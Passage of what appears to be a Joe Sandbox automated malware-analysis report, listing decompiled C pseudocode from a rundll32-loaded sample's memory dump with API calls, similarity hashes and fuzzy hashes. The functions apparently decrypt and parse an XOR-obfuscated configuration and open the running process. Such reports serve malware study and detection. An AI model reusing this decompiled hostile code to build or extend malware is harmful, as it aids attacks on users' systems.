                                      								goto L21;
                                      							}
                                      							L19:
                                      							if(_v8 != 0) {
                                      								E04DE4C73(_v8);
                                      							}
                                      							goto L21;
                                      						}
                                      						memcpy(_t51, _a4, _t53);
                                      						L8:
                                      						_t63 = _v8;
                                      						E04DE679A(_t58, _t73, _t63, _t53,  &_v32);
                                      						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                                      							L15:
                                      							_t53 = 0;
                                      							goto L19;
                                      						} else {
                                      							 *_a8 = _t63;
                                      							goto L18;
                                      						}
                                      					}
                                      					_t58 =  &_v144;
                                      					_t42 = E04DE3072(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
                                      					__eflags = _t42;
                                      					if(_t42 != 0) {
                                      						_t53 = _v12;
                                      						goto L18;
                                      					}
                                      					_t53 = _v148;
                                      					__eflags = _v12 - _t53;
                                      					if(__eflags >= 0) {
                                      						goto L8;
                                      					}
                                      					goto L15;
                                      				}
                                      			}

                                      APIs
                                      • memcpy.NTDLL(00000000,?,?,?,?,04DE58B7,00000001,?,?,04DE58B7), ref: 04DE186C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID:
                                      • API String ID: 3510742995-0
                                      • Opcode ID: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                      • Instruction ID: 314911ed662d18fb3b65036ce6137d396ed275137ce47a5aca93034adb843ee5
                                      • Opcode Fuzzy Hash: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                      • Instruction Fuzzy Hash: 2731EA72F00219BFEF25FEA6C8C0AFDB7B9BB04318F1045A9E555A7141D630AE46DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.568538445.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_2f10000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: dd415d2dbdb7d154c94c834763c5cb9e4d4232cf84615e1dc290bd74be3a31cd
                                      • Instruction ID: 0f5550ca1a0cebfa070ac41730a831449ea984a94561d8d753e6654975493835
                                      • Opcode Fuzzy Hash: dd415d2dbdb7d154c94c834763c5cb9e4d4232cf84615e1dc290bd74be3a31cd
                                      • Instruction Fuzzy Hash: 9D4113B49012068FDB04CFA8C5947AEBBF0FF48308F24856DD958AB351D37AA946CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE427E(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                                      				void* _t21;
                                      				void* _t22;
                                      				signed int _t24;
                                      				intOrPtr* _t26;
                                      				void* _t27;
                                      
                                      				_t26 = __edi;
                                      				if(_a4 == 0) {
                                      					L2:
                                      					_t27 = E04DE4E0B(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                      					if(_t27 == 0) {
                                      						_t24 = _a12 >> 1;
                                      						if(_t24 == 0) {
                                      							_t27 = 2;
                                      							HeapFree( *0x4dea2d8, 0, _a4);
                                      						} else {
                                      							_t21 = _a4;
                                      							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                      							 *_t26 = _t21;
                                      						}
                                      					}
                                      					L6:
                                      					return _t27;
                                      				}
                                      				_t22 = E04DE6D05(_a4, _a8, _a12, __edi); // executed
                                      				_t27 = _t22;
                                      				if(_t27 == 0) {
                                      					goto L6;
                                      				}
                                      				goto L2;
                                      			}

                                      APIs
                                        • Part of subcall function 04DE6D05: SysFreeString.OLEAUT32(00000000), ref: 04DE6D68
                                      • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7705F710,?,00000000,?,00000000,?,04DE681F,?,004F0053,054A93D8,00000000,?), ref: 04DE42E1
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Free$HeapString
                                      • String ID:
                                      • API String ID: 3806048269-0
                                      • Opcode ID: f4ecdfc22aff0d98f57a475a27f206244c05c840d9340a8b8f554eda2c30dfb5
                                      • Instruction ID: 21cc2b49eb9c92c8b638293046c725fdf3bdcd73c49e373a67cc67884467c637
                                      • Opcode Fuzzy Hash: f4ecdfc22aff0d98f57a475a27f206244c05c840d9340a8b8f554eda2c30dfb5
                                      • Instruction Fuzzy Hash: 0901FB36601619BBDF22AF96CC11EEE7B65FF44750F458028FE099A221D731E960DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E04DE723B(void* __ecx, void* __edx, void* _a4, void* _a8) {
                                      				void* _t13;
                                      				void* _t21;
                                      
                                      				_t11 =  &_a4;
                                      				_t21 = 0;
                                      				__imp__( &_a8);
                                      				_t13 = E04DE3072( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                                      				if(_t13 == 0) {
                                      					_t21 = E04DE4DF6(_a8 + _a8);
                                      					if(_t21 != 0) {
                                      						E04DE1908(_a4, _t21, _t23);
                                      					}
                                      					E04DE4C73(_a4);
                                      				}
                                      				return _t21;
                                      			}
                                      Addresses: 0x04de7243 0x04de724a 0x04de724c 0x04de725b 0x04de7262 0x04de7271 0x04de7275 0x04de727c 0x04de727c 0x04de7284 0x04de7289 0x04de728e

                                      APIs
                                      • lstrlen.KERNEL32(?,?,?,00000000,?,04DE379D,00000000,?,?,?,04DE653D,?,054A95B0), ref: 04DE724C
                                        • Part of subcall function 04DE3072: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04DE58B7), ref: 04DE30AA
                                        • Part of subcall function 04DE3072: memcpy.NTDLL(?,04DE58B7,00000010,?,?,?,?,?,?,?,?,?,?,04DE564C,00000000,04DE6D90), ref: 04DE30C3
                                        • Part of subcall function 04DE3072: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 04DE30EC
                                        • Part of subcall function 04DE3072: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04DE3104
                                        • Part of subcall function 04DE3072: memcpy.NTDLL(00000000,04DE6D90,04DE58B7,0000011F), ref: 04DE3156
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                      • String ID:
                                      • API String ID: 894908221-0
                                      • Opcode ID: a651047afcd04cc9ac1b2849cf4cf11d2ae9afc1cf99d216d80729643c917f99
                                      • Instruction ID: 1087ce4d0b8c2072648004512ae615cf2acd44661d306785e06bacd00495a37a
                                      • Opcode Fuzzy Hash: a651047afcd04cc9ac1b2849cf4cf11d2ae9afc1cf99d216d80729643c917f99
                                      • Instruction Fuzzy Hash: B8F054762001087BEF11BE56DC04CFF3B6DEF85264B008011FD19CA110DA72E6559BB0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE3B76(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                                      				void* _t17;
                                      
                                      				if(_a4 == 0) {
                                      					L2:
                                      					return E04DE3BBE(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                      				}
                                      				_t17 = E04DE78E7(_a4, _a8, _a12, _a16, _a20); // executed
                                      				if(_t17 != 0) {
                                      					goto L2;
                                      				}
                                      				return _t17;
                                      			}
                                      Addresses: 0x04de3b7e 0x04de3b98 0x00000000 0x04de3bb4 0x04de3b8f 0x04de3b96 0x00000000 0x00000000 0x04de3bbb

                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,04DE6FE9,3D04DE90,80000002,04DE2A82,04DE744C,74666F53,4D4C4B48,04DE744C,?,3D04DE90,80000002,04DE2A82,?), ref: 04DE3B9B
                                        • Part of subcall function 04DE78E7: SysAllocString.OLEAUT32(04DE744C), ref: 04DE7900
                                        • Part of subcall function 04DE78E7: SysFreeString.OLEAUT32(00000000), ref: 04DE7941
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocFreelstrlen
                                      • String ID:
                                      • API String ID: 3808004451-0
                                      • Opcode ID: 3a43342eb04238db7bf6cec37716cfd030c52b195fac265d57d5b00a083b1a95
                                      • Instruction ID: 89b1a362d540a0ac83bfe72ef5cd55683fe09f2c31b37aab8b42dcc16ef43679
                                      • Opcode Fuzzy Hash: 3a43342eb04238db7bf6cec37716cfd030c52b195fac265d57d5b00a083b1a95
                                      • Instruction Fuzzy Hash: BCF07F3210020ABBDF066F92DC05EAA3B6AEB18354F048014BE1555160DB32D9B1EBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE6D7F(void* __edi, void* _a4) {
                                      				int _t7;
                                      				int _t12;
                                      
                                      				_t7 = E04DE55D3(__edi, _a4,  &_a4); // executed
                                      				_t12 = _t7;
                                      				if(_t12 != 0) {
                                      					memcpy(__edi, _a4, _t12);
                                      					 *((char*)(__edi + _t12)) = 0;
                                      					E04DE4C73(_a4);
                                      				}
                                      				return _t12;
                                      			}
                                      Addresses: 0x04de6d8b 0x04de6d90 0x04de6d94 0x04de6d9b 0x04de6da6 0x04de6daa 0x04de6daa 0x04de6db3

                                      APIs
                                        • Part of subcall function 04DE55D3: memcpy.NTDLL(00000000,00000110,?,?,?,?,04DE6D90,?,04DE58B7,04DE58B7,?), ref: 04DE5609
                                        • Part of subcall function 04DE55D3: memset.NTDLL ref: 04DE567F
                                        • Part of subcall function 04DE55D3: memset.NTDLL ref: 04DE5693
                                      • memcpy.NTDLL(?,04DE58B7,00000000,?,04DE58B7,04DE58B7,?,?,04DE58B7,?), ref: 04DE6D9B
                                        • Part of subcall function 04DE4C73: RtlFreeHeap.NTDLL(00000000,00000000,04DE55C4,00000000,?,?,00000000), ref: 04DE4C7F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: memcpymemset$FreeHeap
                                      • String ID:
                                      • API String ID: 3053036209-0
                                      • Opcode ID: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                      • Instruction ID: 3bbaaa98bb67b5c7f2eac1af6d505cf75506be58944e44d7eb23ccf15ddd03ac
                                      • Opcode Fuzzy Hash: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                      • Instruction Fuzzy Hash: 7FE08C33A04528BBDB123A96DC00EFB7F5DDF556D4F044120FE088A214D631EA2093F2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 93%
                                      			E04DE475F(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                                      				int _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				signed int _t28;
                                      				signed int _t33;
                                      				signed int _t39;
                                      				char* _t45;
                                      				char* _t46;
                                      				char* _t47;
                                      				char* _t48;
                                      				char* _t49;
                                      				char* _t50;
                                      				void* _t51;
                                      				void* _t52;
                                      				void* _t53;
                                      				intOrPtr _t54;
                                      				void* _t56;
                                      				intOrPtr _t57;
                                      				intOrPtr _t58;
                                      				signed int _t61;
                                      				intOrPtr _t64;
                                      				signed int _t65;
                                      				signed int _t70;
                                      				void* _t72;
                                      				void* _t73;
                                      				signed int _t75;
                                      				signed int _t78;
                                      				signed int _t82;
                                      				signed int _t86;
                                      				signed int _t90;
                                      				signed int _t94;
                                      				signed int _t98;
                                      				void* _t101;
                                      				void* _t102;
                                      				void* _t115;
                                      				void* _t118;
                                      				intOrPtr _t121;
                                      
                                      				_t118 = __esi;
                                      				_t115 = __edi;
                                      				_t104 = __ecx;
                                      				_t101 = __ebx;
                                      				_t28 =  *0x4dea344; // 0x69b25f44
                                      				if(E04DE4556( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                      					 *0x4dea378 = _v8;
                                      				}
                                      				_t33 =  *0x4dea344; // 0x69b25f44
                                      				if(E04DE4556( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                      					_v12 = 2;
                                      					L69:
                                      					return _v12;
                                      				}
                                      				_t39 =  *0x4dea344; // 0x69b25f44
                                      				_push(_t115);
                                      				if(E04DE4556( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                      					L67:
                                      					HeapFree( *0x4dea2d8, 0, _v16);
                                      					goto L69;
                                      				} else {
                                      					_push(_t101);
                                      					_t102 = _v12;
                                      					if(_t102 == 0) {
                                      						_t45 = 0;
                                      					} else {
                                      						_t98 =  *0x4dea344; // 0x69b25f44
                                      						_t45 = E04DE296E(_t104, _t102, _t98 ^ 0x7895433b);
                                      					}
                                      					_push(_t118);
                                      					if(_t45 != 0) {
                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                      							 *0x4dea2e0 = _v8;
                                      						}
                                      					}
                                      					if(_t102 == 0) {
                                      						_t46 = 0;
                                      					} else {
                                      						_t94 =  *0x4dea344; // 0x69b25f44
                                      						_t46 = E04DE296E(_t104, _t102, _t94 ^ 0x219b08c7);
                                      					}
                                      					if(_t46 != 0) {
                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                      							 *0x4dea2e4 = _v8;
                                      						}
                                      					}
                                      					if(_t102 == 0) {
                                      						_t47 = 0;
                                      					} else {
                                      						_t90 =  *0x4dea344; // 0x69b25f44
                                      						_t47 = E04DE296E(_t104, _t102, _t90 ^ 0x31fc0661);
                                      					}
                                      					if(_t47 != 0) {
                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                      							 *0x4dea2e8 = _v8;
                                      						}
                                      					}
                                      					if(_t102 == 0) {
                                      						_t48 = 0;
                                      					} else {
                                      						_t86 =  *0x4dea344; // 0x69b25f44
                                      						_t48 = E04DE296E(_t104, _t102, _t86 ^ 0x0cd926ce);
                                      					}
                                      					if(_t48 != 0) {
                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                      							 *0x4dea004 = _v8;
                                      						}
                                      					}
                                      					if(_t102 == 0) {
                                      						_t49 = 0;
                                      					} else {
                                      						_t82 =  *0x4dea344; // 0x69b25f44
                                      						_t49 = E04DE296E(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                                      					}
                                      					if(_t49 != 0) {
                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                      							 *0x4dea02c = _v8;
                                      						}
                                      					}
                                      					if(_t102 == 0) {
                                      						_t50 = 0;
                                      					} else {
                                      						_t78 =  *0x4dea344; // 0x69b25f44
                                      						_t50 = E04DE296E(_t104, _t102, _t78 ^ 0x2878b929);
                                      					}
                                      					if(_t50 == 0) {
                                      						L41:
                                      						 *0x4dea2ec = 5;
                                      						goto L42;
                                      					} else {
                                      						_t104 =  &_v8;
                                      						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                      							goto L41;
                                      						} else {
                                      							L42:
                                      							if(_t102 == 0) {
                                      								_t51 = 0;
                                      							} else {
                                      								_t75 =  *0x4dea344; // 0x69b25f44
                                      								_t51 = E04DE296E(_t104, _t102, _t75 ^ 0x261a367a);
                                      							}
                                      							if(_t51 != 0) {
                                      								_push(_t51);
                                      								_t72 = 0x10;
                                      								_t73 = E04DE3A24(_t72);
                                      								if(_t73 != 0) {
                                      									_push(_t73);
                                      									E04DE3F7E();
                                      								}
                                      							}
                                      							if(_t102 == 0) {
                                      								_t52 = 0;
                                      							} else {
                                      								_t70 =  *0x4dea344; // 0x69b25f44
                                      								_t52 = E04DE296E(_t104, _t102, _t70 ^ 0xb9d404b2);
                                      							}
                                      							if(_t52 != 0 && E04DE3A24(0, _t52) != 0) {
                                      								_t121 =  *0x4dea3cc; // 0x54a95b0
                                      								E04DE68F5(_t121 + 4, _t68);
                                      							}
                                      							if(_t102 == 0) {
                                      								_t53 = 0;
                                      							} else {
                                      								_t65 =  *0x4dea344; // 0x69b25f44
                                      								_t53 = E04DE296E(_t104, _t102, _t65 ^ 0x3df17130);
                                      							}
                                      							if(_t53 == 0) {
                                      								L59:
                                      								_t54 =  *0x4dea348; // 0x6bd5a8
                                      								_t22 = _t54 + 0x4deb252; // 0x616d692f
                                      								 *0x4dea374 = _t22;
                                      								goto L60;
                                      							} else {
                                      								_t64 = E04DE3A24(0, _t53);
                                      								 *0x4dea374 = _t64;
                                      								if(_t64 != 0) {
                                      									L60:
                                      									if(_t102 == 0) {
                                      										_t56 = 0;
                                      									} else {
                                      										_t61 =  *0x4dea344; // 0x69b25f44
                                      										_t56 = E04DE296E(_t104, _t102, _t61 ^ 0xd2079859);
                                      									}
                                      									if(_t56 == 0) {
                                      										_t57 =  *0x4dea348; // 0x6bd5a8
                                      										_t23 = _t57 + 0x4deb791; // 0x6976612e
                                      										_t58 = _t23;
                                      									} else {
                                      										_t58 = E04DE3A24(0, _t56);
                                      									}
                                      									 *0x4dea3e0 = _t58;
                                      									HeapFree( *0x4dea2d8, 0, _t102);
                                      									_v12 = 0;
                                      									goto L67;
                                      								}
                                      								goto L59;
                                      							}
                                      						}
                                      					}
                                      				}
                                      			}
                                      Addresses: 0x04de475f 0x04de475f 0x04de475f 0x04de475f 0x04de4762 0x04de477f 0x04de478d 0x04de478d 0x04de4792 0x04de47ac 0x04de4a1a 0x04de4a21 0x04de4a25 0x04de4a25 0x04de47b2 0x04de47b7 0x04de47cf 0x04de4a07 0x04de4a11 0x00000000 0x04de47d5 0x04de47d5 0x04de47d6 0x04de47db 0x04de47f1 0x04de47dd 0x04de47dd 0x04de47ea 0x04de47ea 0x04de47f3 0x04de47fc 0x04de47fe 0x04de4808 0x04de480d 0x04de480d 0x04de4808 0x04de4814 0x04de482a 0x04de4816 0x04de4816 0x04de4823 0x04de4823 0x04de482e 0x04de4830 0x04de483a 0x04de483f 0x04de483f 0x04de483a 0x04de4846 0x04de485c 0x04de4848 0x04de4848 0x04de4855 0x04de4855 0x04de4860 0x04de4862 0x04de486c 0x04de4871 0x04de4871 0x04de486c 0x04de4878 0x04de488e 0x04de487a 0x04de487a 0x04de4887 0x04de4887 0x04de4892 0x04de4894 0x04de489e 0x04de48a3 0x04de48a3 0x04de489e 0x04de48aa 0x04de48c0 0x04de48ac 0x04de48ac 0x04de48b9 0x04de48b9 0x04de48c4 0x04de48c6 0x04de48d0 0x04de48d5 0x04de48d5 0x04de48d0 0x04de48dc 0x04de48f2 0x04de48de 0x04de48de 0x04de48eb 0x04de48eb 0x04de48f6 0x04de4909 0x04de4909 0x00000000 0x04de48f8 0x04de48f8 0x04de4902 0x00000000 0x04de4913 0x04de4913 0x04de4915 0x04de492b 0x04de4917 0x04de4917 0x04de4924 0x04de4924 0x04de492f 0x04de4931 0x04de4934 0x04de4935 0x04de493c 0x04de493e 0x04de493f 0x04de493f 0x04de493c 0x04de4946 0x04de495c 0x04de4948 0x04de4948 0x04de4955 0x04de4955 0x04de4960 0x04de496e 0x04de4978 0x04de4978 0x04de4980 0x04de4996 0x04de4982 0x04de4982 0x04de498f 0x04de498f 0x04de499a 0x04de49ad 0x04de49ad 0x04de49b2 0x04de49b8 0x00000000 0x04de499c 0x04de499f 0x04de49a4 0x04de49ab 0x04de49bd 0x04de49bf 0x04de49d5 0x04de49c1 0x04de49c1 0x04de49ce 0x04de49ce 0x04de49d9 0x04de49e5 0x04de49ea 0x04de49ea 0x04de49db 0x04de49de 0x04de49de 0x04de49f8 0x04de49fd 0x04de4a03 0x00000000
                                      0x04de4a06
                                      0x00000000
                                      0x04de49ab
                                      0x04de499a
                                      0x04de4902
                                      0x04de48f6

                                      APIs
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE4804
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE4836
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE4868
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE489A
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE48CC
                                      • StrToIntExA.SHLWAPI(00000000,00000000,?,04DEA00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04DE48FE
                                      • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04DE49FD
                                      • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04DE4A11
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeap
                                      • String ID:
                                      • API String ID: 3298025750-0
                                      • Opcode ID: a418942d1b42206bdc842021b29572ed6fb3c3be434280d07ff55e67a92d564e
                                      • Instruction ID: fbffb1b1275eeff0a9205d32330e1372a5b6270c0a5a6e22fd013263b73fc8cd
                                      • Opcode Fuzzy Hash: a418942d1b42206bdc842021b29572ed6fb3c3be434280d07ff55e67a92d564e
                                      • Instruction Fuzzy Hash: 70816970B10206ABDB10FBBBDDD4D7F77E9EB89710B24492AA101EB304E639FD419660
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E04DE515F(intOrPtr _a4) {
                                      				void* _t2;
                                      				unsigned int _t4;
                                      				void* _t5;
                                      				long _t6;
                                      				void* _t7;
                                      				void* _t15;
                                      
                                      				_t2 = CreateEventA(0, 1, 0, 0);
                                      				 *0x4dea30c = _t2;
                                      				if(_t2 == 0) {
                                      					return GetLastError();
                                      				}
                                      				_t4 = GetVersion();
                                      				if(_t4 != 5) {
                                      					L4:
                                      					if(_t15 <= 0) {
                                      						_t5 = 0x32;
                                      						return _t5;
                                      					}
                                      					L5:
                                      					 *0x4dea2fc = _t4;
                                      					_t6 = GetCurrentProcessId();
                                      					 *0x4dea2f8 = _t6;
                                      					 *0x4dea304 = _a4;
                                      					_t7 = OpenProcess(0x10047a, 0, _t6);
                                      					 *0x4dea2f4 = _t7;
                                      					if(_t7 == 0) {
                                      						 *0x4dea2f4 =  *0x4dea2f4 | 0xffffffff;
                                      					}
                                      					return 0;
                                      				}
                                      				if(_t4 >> 8 > 0) {
                                      					goto L5;
                                      				}
                                      				_t15 = _t4 - _t4;
                                      				goto L4;
                                      			}


                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04DE3D54,?), ref: 04DE5167
                                      • GetVersion.KERNEL32 ref: 04DE5176
                                      • GetCurrentProcessId.KERNEL32 ref: 04DE5192
                                      • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04DE51AF
                                      • GetLastError.KERNEL32 ref: 04DE51CE
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                      • String ID:
                                      • API String ID: 2270775618-0
                                      • Opcode ID: 3db412b6ee3a6443bf845e229ebcb5574fae83ed311898bd22bc4cd7812e2f34
                                      • Instruction ID: f427f89841eaa006bba7888321c9bd1ecd7a1951bd237a13fe409df44e6fb9ae
                                      • Opcode Fuzzy Hash: 3db412b6ee3a6443bf845e229ebcb5574fae83ed311898bd22bc4cd7812e2f34
                                      • Instruction Fuzzy Hash: 6EF081B4B41303FBDB247FA3B839B243BA0E704799F104455E552EE3C0E6BAA840CB15
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 49%
                                      			E04DE198A(void* __ecx, intOrPtr* _a4) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				void _v76;
                                      				intOrPtr* _t226;
                                      				signed int _t229;
                                      				signed int _t231;
                                      				signed int _t233;
                                      				signed int _t235;
                                      				signed int _t237;
                                      				signed int _t239;
                                      				signed int _t241;
                                      				signed int _t243;
                                      				signed int _t245;
                                      				signed int _t247;
                                      				signed int _t249;
                                      				signed int _t251;
                                      				signed int _t253;
                                      				signed int _t255;
                                      				signed int _t257;
                                      				signed int _t259;
                                      				signed int _t338;
                                      				signed char* _t348;
                                      				signed int _t349;
                                      				signed int _t351;
                                      				signed int _t353;
                                      				signed int _t355;
                                      				signed int _t357;
                                      				signed int _t359;
                                      				signed int _t361;
